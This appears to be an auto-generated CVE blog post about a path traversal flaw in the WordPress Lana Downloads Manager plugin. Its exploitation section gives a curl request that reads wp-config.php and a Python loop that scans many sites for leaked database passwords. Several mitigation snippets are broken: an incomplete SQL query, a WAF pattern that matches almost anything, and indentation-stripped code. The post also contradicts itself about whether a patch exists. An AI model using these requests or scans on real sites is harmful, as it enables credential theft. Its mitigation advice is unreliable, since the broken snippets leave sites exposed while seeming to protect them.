WordPress Lana Downloads Manager, Path Traversal, CVE-2025-2048 (Critical)

Listen to this Post

How CVE-2025-2048 Works

The Lana Downloads Manager plugin (before v1.10.0) fails to sanitize user-controlled input in file download requests. Admin-level attackers can manipulate the `file` parameter to traverse directories (e.g., ../../wp-config.php), exposing sensitive server files. The vulnerability stems from insecure `file_get_contents()` usage without path normalization checks, allowing arbitrary file read via crafted HTTP requests like:

/wp-admin/admin-ajax.php?action=lana_downloads_manager&file=../../../etc/passwd

DailyCVE Form

Platform: WordPress
Version: <1.10.0
Vulnerability: Path Traversal
Severity: Critical
Date: 2025-04-01

Prediction: Patch expected by 2025-07-15

What Undercode Say:

Exploitation

1. Craft malicious request:

curl -X GET "http://victimsite.com/wp-admin/admin-ajax.php?action=lana_downloads_manager&file=../../wp-config.php" -H "Cookie: admin_session=VALID_SESSION"

2. Automated scanning:

import requests
targets = ["site1.com", "site2.com"]
for site in targets:
r = requests.get(f"https://{site}/wp-admin/admin-ajax.php?action=lana_downloads_manager&file=../../wp-config.php")
if "DB_PASSWORD" in r.text:
print(f"Vulnerable: {site}")

Protection

1. Immediate mitigation:

// Patch snippet for lana-downloads-manager.php
$allowed_path = realpath(LANA_DOWNLOADS_PATH);
$requested_file = realpath($allowed_path . $_GET['file']);
if (strpos($requested_file, $allowed_path) !== 0) {
die("Invalid file path");
}

2. WAF rule:

location ~ /wp-admin/admin-ajax.php {
if ($args ~ "file=...") { return 403; }
}

3. Post-exploit detection:

SELECT FROM wp_options WHERE option_name LIKE '%lana_downloads%' AND option_value LIKE '%..%';

4. Upgrade command:

wp plugin update lana-downloads-manager --version=1.10.0

5. Intrusion check:

grep -r "lana_downloads_manager" /var/log/apache2/access.log | grep -q "../" && echo "Exploit attempt detected"

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top